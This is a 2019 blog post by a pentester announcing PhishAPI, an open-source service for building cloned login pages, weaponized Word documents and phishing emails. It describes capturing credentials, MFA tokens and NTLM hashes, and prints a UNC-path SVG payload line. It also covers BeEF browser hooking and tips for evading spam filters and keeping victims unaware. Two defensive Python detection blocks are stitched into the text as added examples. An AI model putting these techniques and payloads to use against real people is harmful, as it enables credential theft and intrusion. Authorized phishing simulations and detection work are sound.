PhishAPI Tool — Rapid Deployment of Fake Sites and Maldocs with Notifications

Intro / TL;DR

Curtis Brazzell
May 10, 2019

Hey InfoSec Community! As a pentester, I got tired of setting up and tearing down environments each time I or one of my team members wanted to start a new phishing campaign. This accounted for a good portion of the time allocated for our engagement. Sure, we saved local templates and code, but it was still time-consuming to modify the cloned HTML, host it in two places, and set up a back-end service to capture, store, and display the credentials. What started as a simple PHP API that accepted a username and password and posted directly to Slack evolved into a full web-based phishing service out of a desire to improve efficiency internally.

I developed this on my own time and wanted to give back and share with the community, so I decided to open-source it for everyone. The idea is that other security teams can adopt this as a platform, companies can use this for internal security awareness training, self learning for those interested in InfoSec, or even as honeypot bait (think Canary). Using this service ourselves, we’ve gained a ton of efficiency and can better use our time to perform more recon or develop new campaigns instead of prepping. You can literally be up and running with a cloned site or maldoc within minutes, ready to be notified of any “victims”. It can be quite comical to watch them start pouring in, so I added some flair for fun. 😄

Check out the free service (w/ Slack demo) at https://phishapi.com or clone it to host yourself at https://github.com/curtbraz/Phishing-API.

Current Functionality

  • Fake Sites
  • Templates — Auto-Generated HTML Landing Pages
  • Support for Custom HTML
  • Malicious Documents
  • New Word Documents
  • Weaponizing Existing Word Documents
  • Payloads
  • Hosted vs Downloaded
  • Email Campaign Templates
  • Credential Capturing
  • Real-time Alerting
  • Database for Reporting
  • Hash Capturing
  • BeEF Hooking
  • Trophies

The API is written as a server-side script so that it performs as both a client and server for the user. There’s nothing to install locally, it’s all accessible via a web browser. The service should be publicly accessible so that “victims” can reach it and should be set up with an SSL certificate. See LetsEncrypt for a free one. Simply clone the GitHub repository to a web service, set the config.php variables, and start phishing!

Note: The API rarely gets flagged as a blacklisted site by “victims” because it’s usually not seen. The API receives the HTTP POST request and redirects the user immediately to the supplied location.

When ready, head to your new domain and you’ll be presented with two options:

Main Page — Choose “Fake Portal”, “Weaponized Documents”, or “Email Campaigns”

Fake Sites

One of the main features of the PhishAPI is credential, MFA token, and hash capturing via a cloned or fake login portal. You can either create your own HTML page from scratch, use a cloning tool such as HTTrack, or select one of the pre-defined templates to have your HTML auto-generated for you directly from the API!

Creating HTML or Editing From Another Source

If you’re creating your own landing page or cloning one manually, you can still leverage the benefits of the PhishAPI. Simply make sure the “username”, “password”, and optionally, “token” fields are set. For fun, Slack options can be included as hidden input fields. See the screenshot below or the GitHub repository for more information.

Instructions for Manual HTML

Auto-Generated HTML Templates

PhishAPI supports generating templates for you that can be stored on an external server. They are automatically configured with the input you provide to dynamically support the API. Options for MFA, the server address, custom logos, custom title tags, Slack bot names and emojis, and required fields are supported. Simply select “Fake Sites” from the main page and choose one of the following templates:

Repository of Login Portals

After selecting a template, complete the following form to have the HTML generated automatically for you:

HTML Generation Options

The “API URL” is simply the API Domain you want the HTML form POSTing to. The value should already be set for you.

“Project Name” is the name of the engagement, if this is for a Phishing project. An organization name or campaign title is typically what you’d set here. If left blank, it will be logged as “Undefined Project”.

“Redirect URL” is the path you want the “victim” taken to after they submit their credentials. To avoid suspicion, set a location that wouldn’t be as likely to tip them off. I’m a fan of redirecting them to the real location they already have a session open with so they’re simply logged in. If you choose a location that supports iframes, persistence will be established for BeEF hooking by placing the redirect location in a full body iframe. Otherwise, it’s a simple 302 Redirect.

“Slack Bot Name” and “Slack Bot Logo” are pretty self-explanatory. Set these if you don’t want to use the default name and emoji for the Slack notifications.

“Website Logo URL” can be set as an image URL. This field is optional and if set, will add or change the default template image with the one specified. This can be useful to make a generic login page look like it’s branded for the targeted individual or organization. You should use HTTPS if your landing page is going to be hosted over HTTPS to avoid mixed content warnings. This field doesn’t always work for sites that are already branded, such as Facebook.

“Website Title” is similar to the URL above. It sets the <TITLE> and main Header tag if supplied, or otherwise defaults to “Secure Login Portal”.

“MFA Token” options dynamically allow for setting an additional third “Token” input field in case the organization you’re targeting uses multi-factor tokens. If the “Require” field is also checked, HTML5 enforces the field to be completed before the “victim” can submit the login form.

Submitting the API form here takes you to a download page, where you can now instantly retrieve your ready-to-use phishing source code as an archive. Simply upload this to your web service and start having your “victims” go there! Any of the HTML can be modified manually once downloaded to suit your needs.

Auto-Generated HTML Landing Page Based on Options Set
Spoofed Google Login Site with Required MFA Field

Malicious Documents

In addition to fake login portals, PhishAPI also supports the auto-generation of malicious documents (maldocs). Currently, only Microsoft Word documents are supported, but support for other formats is coming soon. Simply head over to “Weaponized Documents” from the main page to begin!

Options for Creating a Weaponized Document

“API URL” fields should be set for the Word document to call back to. This should be the domain of your API, which should already be set for you. Select HTTP or HTTPS.

“Target” should be the name of the individual who will be the recipient of the email. You can leave this blank if you provide an Organization.

“Organization” is simply the name of the company or organization you’re targeting. This helps keep track of multiple projects in case campaigns are happening in parallel. You can leave this blank if you provide a Target.

“Payloads” are options to determine what it is you want the Word document to do once opened. More detail on this below. “HTTP Call” and “SMB Hash” are defaults and cannot be unchecked.

“Slack Settings” are not required if set in your config.php file. They tell the API what Slack channel the specific document should call back to and which Slack Incoming Webhook token to use in order to leverage the Slack API.

New Word Documents

To quickly generate a Word Document from scratch to start sending to Phishing victims, click “Generate Payload” without uploading an existing document. A default template is created for you, which is designed to attempt to fool the “victim” into enabling editing to trigger the payload(s) selected.

Weaponizing Existing Word Documents

To embed an existing Word document with the selected payloads, simply upload an existing docx file before clicking “Generate Payload”. The API will receive the doc, inject the payloads into it, and allow you to re-download it for use in your phishing campaign.

Payloads

The fun part! Select between the following:

  • HTTP Call

This option (included by default) will embed the document with a 0 x 0 pixel which calls back to the API with a unique identifier which was created when you first generated your document. This “UUID” is used to look up your Slack settings from the database and notify you that the document was opened by the target. The UUID is used so that personal Slack settings aren’t available to the recipient of the document. The “victim” does not notice anything upon opening the document. “Protected View” must be enabled in legacy versions of Word for this to work, but is often enabled by default. The auto-generated version is created to trick the user into enabling this to view the rest of the content in the document. Office 365 web view does NOT require clicking anything, as it just works when opened!

  • SMB Hash

This option (included by default) will also embed a UNC path in addition to the HTTP call in another 0 x 0 pixel. The document will attempt to connect over SMB to the API server. If Responder is configured in a Screen session on the API server and “phishinghashes.sh” is scheduled in a Cron job, hashes may be captured and sent to the Slack channel. Note: For this to work, the victim’s ISP and outbound egress ACLs must allow TCP 445. Your API server must also allow incoming TCP 445. The “victim” does not notice anything upon opening the document.

  • Auth Prompt

This optional field, if checked, will perform the same service Phishery does. (Thanks for the idea, Ryan Hanson!) For those of you unfamiliar, a basic authentication request will be made from the “victim”, prompting for credentials. If typed in, the API captures the input, updates the database tables, and alerts via Slack.

If “Auth Prompt” is Checked, the “Victim” Sees This Upon Opening the Document
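For defenders triaging a suspicious .docx, the three payloads above have one thing in common: the document must reference a remote host. The following Python sketch is an added example, not part of PhishAPI; it assumes the callbacks are stored as external relationships in the package's .rels parts (the usual way Word references remote images and templates), and the host names and sample package are constructed.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

def classify(target):
    """Label an external target by the protocol Word would use to fetch it."""
    if target.startswith("\\\\") or target.lower().startswith("file:"):
        return "smb"   # UNC path: outbound TCP 445 and an NTLM authentication attempt
    if target.lower().startswith(("http://", "https://")):
        return "http"
    return "other"

def external_refs(docx_bytes):
    """Return (part, rel_type, kind, target) for every external relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(z.read(name)).iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                found.append((name, rel_type, classify(target), target))
    return found

def triage(refs):
    """Drop hyperlinks (they need a click); images and templates load on open."""
    return [r for r in refs if r[1] != "hyperlink"]

def build_sample():
    """Constructed sample: a zip holding only .rels parts, not a real document."""
    def rels(*items):
        body = "".join(
            f'<Relationship Id="rId{i}" Type="{OFFICE}{t}" Target="{tgt}" '
            'TargetMode="External"/>' for i, (t, tgt) in enumerate(items, 1))
        return f'<Relationships xmlns="{REL_NS[1:-1]}">{body}</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels(
            ("image", "https://api.example.test/px?id=PLACEHOLDER"),
            ("image", r"\\api.example.test\share\px.jpg"),
            ("hyperlink", "https://intranet.example.test/help")))
        z.writestr("word/_rels/settings.xml.rels", rels(
            ("attachedTemplate", "https://api.example.test/template")))
    return buf.getvalue()
```

Calling `triage(external_refs(build_sample()))` returns the two remote images and the remote template while leaving the ordinary hyperlink out; an `smb` hit is the one that also warrants checking whether outbound TCP 445 is blocked at the perimeter.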

Hosted vs Downloaded

Once generated, the Word document can either be downloaded to be sent as an attachment in an email, uploaded to a NAS, or whatever else you’d like to do with the actual file. However, sometimes sending weaponized documents as attachments can be flagged by spam filters and antivirus. To avoid this, the PhishAPI also allows hosting your document so it can be called from a hyperlink. Using a new technique I discovered while playing with URI Schemes (another blog maybe?), a MS Word hyperlink is created with HTML markup to be used in the body of an email. Once clicked in Windows, the default browser will prompt to open the remote file without the need to download and open manually. This is useful in campaigns where you’re “sharing a file” with someone, such as a spoofed Office 365 or DocuSign email. The URL itself can be hyperlinked, however, if you’d still like that option.

Docx or Hyperlink
Prompt When Hyperlink is Clicked

Email Campaign Templates

The third feature of PhishAPI allows you to select from an archive of email templates you can use to draft your email campaign. You can add your own using a simple WYSIWYG editor via the web interface, or edit an existing one. Variables allow you to add field variables (think MS Word templates) so you can be up and running with a campaign in minutes!

Choose Email Campaign from List
Email Template w/ Variables
Predefined Variables and Embed Notification Tag for Alerting When Email is Opened
Optionally Include Just the Notification Code in the Body of Your Own Email

Credential Capturing

Both the “Fake Site” and “Weaponized Documents” options allow for credential capturing, as described above in their respective categories. When the PhishAPI receives the captured data, real-time Slack alerts are sent to notify the pentester and the credentials are stored in a MySQL database for retrieval.

Real-time Alerting

This is where Slack comes in! In the future, I plan to support Zapier Templates so that users of the API can choose how they want to be notified. Heck, you can dim your IFTTT lights or blink them red when you catch a phish if you really want! Maybe an SMS would be sufficient.

When a user is hooked via BeEF, a hash is captured, a document is opened, or credentials are captured via either method, Slack bots will notify the specified channel(s). See the screenshots below:

“HTTP Call” Weaponized Doc Payload
“Auth Prompt” Weaponized Doc Payload
“SMB Hash” Weaponized Doc Payload OR Submitted Credentials from Fake Site
1x1 Pixel Image for Email Body for Notification Upon Opening
Captured Credentials from “Fake Site”
BeEF Hook from “Fake Site”

Reporting

All captured information is stored in a MySQL database instance on the API server and is easily retrieved via the API in a web HTML table. Clicking the link on a Slack notification will take you to the specific project, or simply browsing “/reporting” for “Fake Sites” or “/phishingdocs/reporting” for “Weaponized Documents” will allow you to browse all projects.

Captured IP, Hash, Username, Password, and User Agent

Hash Capturing

Both the “Weaponized Documents” and “Fake Site” options allow for capturing NTLMv2 hashes by default, if SMB traffic is allowed from the “victim’s” client to the server. The documents embed a UNC path as an invisible image which triggers upon opening and the Fake Site portal API embeds a UNC path via an SVG image tag which works on most browsers.

(<image height="1" width="1" xlink:href="\\YOUR_PHISH_API_DOMAIN/resource.jpg" />)

Captured Hash
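From the defensive side, a page built this way has two inspectable traits: a password form that posts to a different host than the one serving the page, and an image whose source is a UNC path. The following Python check is an added example, not code from PhishAPI; the host names and sample markup are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class PageScanner(HTMLParser):
    """Flags password forms that post off-origin and images loaded from UNC paths."""
    def __init__(self, page_url):
        super().__init__()
        self.page_host = urlparse(page_url).hostname
        self.form_action = None          # None means "not inside a form"
        self.form_has_password = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_action = a.get("action") or ""
            self.form_has_password = False
        elif tag == "input" and self.form_action is not None:
            if (a.get("type") or "").lower() == "password":
                self.form_has_password = True
        elif tag in ("img", "image"):    # HTML <img> and SVG <image>
            for key in ("src", "href", "xlink:href"):
                ref = a.get(key) or ""
                if ref.startswith("\\\\") or ref.lower().startswith("file:"):
                    self.findings.append(("unc-image", ref))

    def handle_endtag(self, tag):
        if tag == "form" and self.form_action is not None:
            host = urlparse(self.form_action).hostname   # None for relative actions
            if self.form_has_password and host and host != self.page_host:
                self.findings.append(("cross-origin-login", self.form_action))
            self.form_action = None

def scan(page_url, html):
    """Return a list of (finding, value) tuples for one fetched page."""
    parser = PageScanner(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page: form fields named as the article describes.
SAMPLE = r'''<html><body>
<form method="post" action="https://api.example.test/">
  <input name="username"><input type="password" name="password">
  <input name="token" required>
</form>
<svg><image height="1" width="1" xlink:href="\\api.example.test/resource.jpg" /></svg>
</body></html>'''
```

Cross-origin login posts also occur on legitimate single sign-on pages, so treat that finding as a signal to correlate with domain age and reputation rather than a verdict on its own.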

BeEF Hooking

BeEF hooking is supported for those that want to use advanced browser techniques. Real-time Slack notifications and persistent iframe techniques allow you to respond immediately to your phishing victims and interact with their browser. Simply run BeEF in a background service on your API server and run “beefhook.php” in a Cron job every minute.

Trophies

Trophies are my sick sense of humor. For me, they’ve added a great deal of entertainment to my #Phishing channel. Think of these as “Achievements” or “Gold Star” awards for doing things such as having a terrible password, entering the same credentials three times, having an insane amount of successfully phished creds for a single campaign, disclosing more than one password for a single user, and submitting credentials at least 3 days after everyone else has stopped.

Animated Gifs When Conditions are Met

Thanks to Troy Hunt’s HaveIBeenPwned Password API, I was able to score captured passwords to determine how many times it showed up in a breach list or paste site. This information is reflected in the Slack alerts via Trophies and “Fake Site” notifications. A :thumbs_up: or :poop: emoji will be reflected in Slack to score password complexity, even if there’s not a HaveIBeenPwned hit.

Conclusion

I hope you find this API as useful as we have on our team at Pondurance! You’re welcome to fork the GitHub repository and edit to your heart’s content! The “Fake Sites” login portal repository does not contain our own templates we use, but feel free to add your own as you go. The demo at https://phishapi.com is available for all to use, I just ask that you please not abuse the service so everyone can enjoy it! Please also do not use this service or my code for illegal purposes.

Happy Cyber Security Awareness Month!
